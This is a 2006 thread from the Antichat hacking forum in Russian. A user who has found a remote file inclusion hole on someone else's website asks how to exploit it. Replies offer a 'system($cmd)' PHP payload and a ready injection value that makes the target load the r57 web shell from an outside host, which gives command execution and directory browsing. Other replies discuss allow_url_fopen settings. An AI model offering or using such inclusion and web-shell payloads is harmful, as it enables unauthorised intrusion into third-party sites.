Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Объясните пожалуйста, нашел php-inj, что можно с нею сделать? (https://forum.antichat.xyz/showthread.php?t=23450)

Марсеанчег 03.09.2006 02:36
Объясните пожалуйста, нашел php-inj, что можно с нею сделать?
 
На одном из сайтов нашел возможность инклуда файла в параметр страницы page=http://mysite.com/icx и файл icx.php выполнеятся. Что можно с этим сделать? Например использовать shell(я в этом темный, объясните или пошлите куда-то прочитать, что оно есть ... и ссылку откуда скачать можно шелл с манулом ;)) )Ну или считать содержимое файлов как? Вот таким кодом хочу считать содержимое файла
PHP код:
    if (fopen("http://www.somesite.com/main.php""r")) { 
    echo "I can open it!";
    $lines file("http://www.somesite.com/main.php"


    foreach ($lines as $line_num => $line) {
    echo "#<b>{$line_num}</b> : " htmlspecialchars($line) . "<br />\n";
    } 
Выдает такую ошибку

#1 : <b>Fatal error</b>: Call to undefined function: showmain() in <b>/home/somesite/public/main.php</b> on line <b>2</b><br />

:confused:

//by SMiX: Код php суем в тег [php]

[loy] 03.09.2006 02:47
иче

Распичатой на бумажке с форматом а4
Сходи с ней в туалет ............ потересь ей
поймеш какая плохая ошибка

Марсеанчег 03.09.2006 09:07
Цитата:
Простейший способ <?php system($cmd);?>
Я так понял эта беда там отключена, пробовал, не пашет...
Цитата:
Распичатой на бумажке с форматом а4
Сходи с ней в туалет ............ потересь ей
поймеш какая плохая ошибка
лечимся...

gadjet 03.09.2006 09:19
Попробуй page=http://rst.void.ru/download/r57shell.txt?
Сможешь выполнять команды, просматривать дирректории... Вобщем, действительно, поищи на ачате, найдешь все, что нужно. Советую посмотреть видео по подобной темматике(VIDEO.ANTICHAT.RU )

SMiX 03.09.2006 13:20
Цитата:
#1 : <b>Fatal error</b>: Call to undefined function: showmain() in <b>/home/somesite/public/main.php</b> on line <b>2</b><br />
А можно весь код посмотреть?

ПыСька: В таких случаях не используем двойные кавычки, ибо производительность уменьшается. Двойные кавычки пхп парсит на наличие переменных, а у тебя там переменных нет - медвежий труд.

nc.STRIEM 03.09.2006 18:03
ну на сколько я помню то функцией fopen() можно открывать только файлы расположенный на том же сайте что и сам файл с функцией....

SMiX 03.09.2006 21:26
nc.STRIEM ты не прав. Такое будет только если хостер спецом так настроит php.ini. По умолчанию урлы fopen открывать может.

em00s7 03.09.2006 22:44
Марсеанчег кидай строчку на который есть showmain() -))) или весь код )

[loy] 05.09.2006 01:33
вот
тут меня попросили нормально написать пишу

вот из мана {

HTTP-соединения являются read-only; вы не можете записывать данные или копировать файлы в HTTP-ресурс.
}
fopen('http://vasya.narod.ru/file','r')
будет открыто соидение http если в php.ini стоит
allow_url_fopen=on
если что обращаейтесть я уже на пхп не первой год пишу

для gadjet
Цитата:
page=http://rst.void.ru/download/r57shell.txt?
если хостер поставил allow_url_fopen=off
то если http://rst.void.ru/download/r57shell.txt обрабатываецо фунций fopen то не фига не получитца


Время: 23:29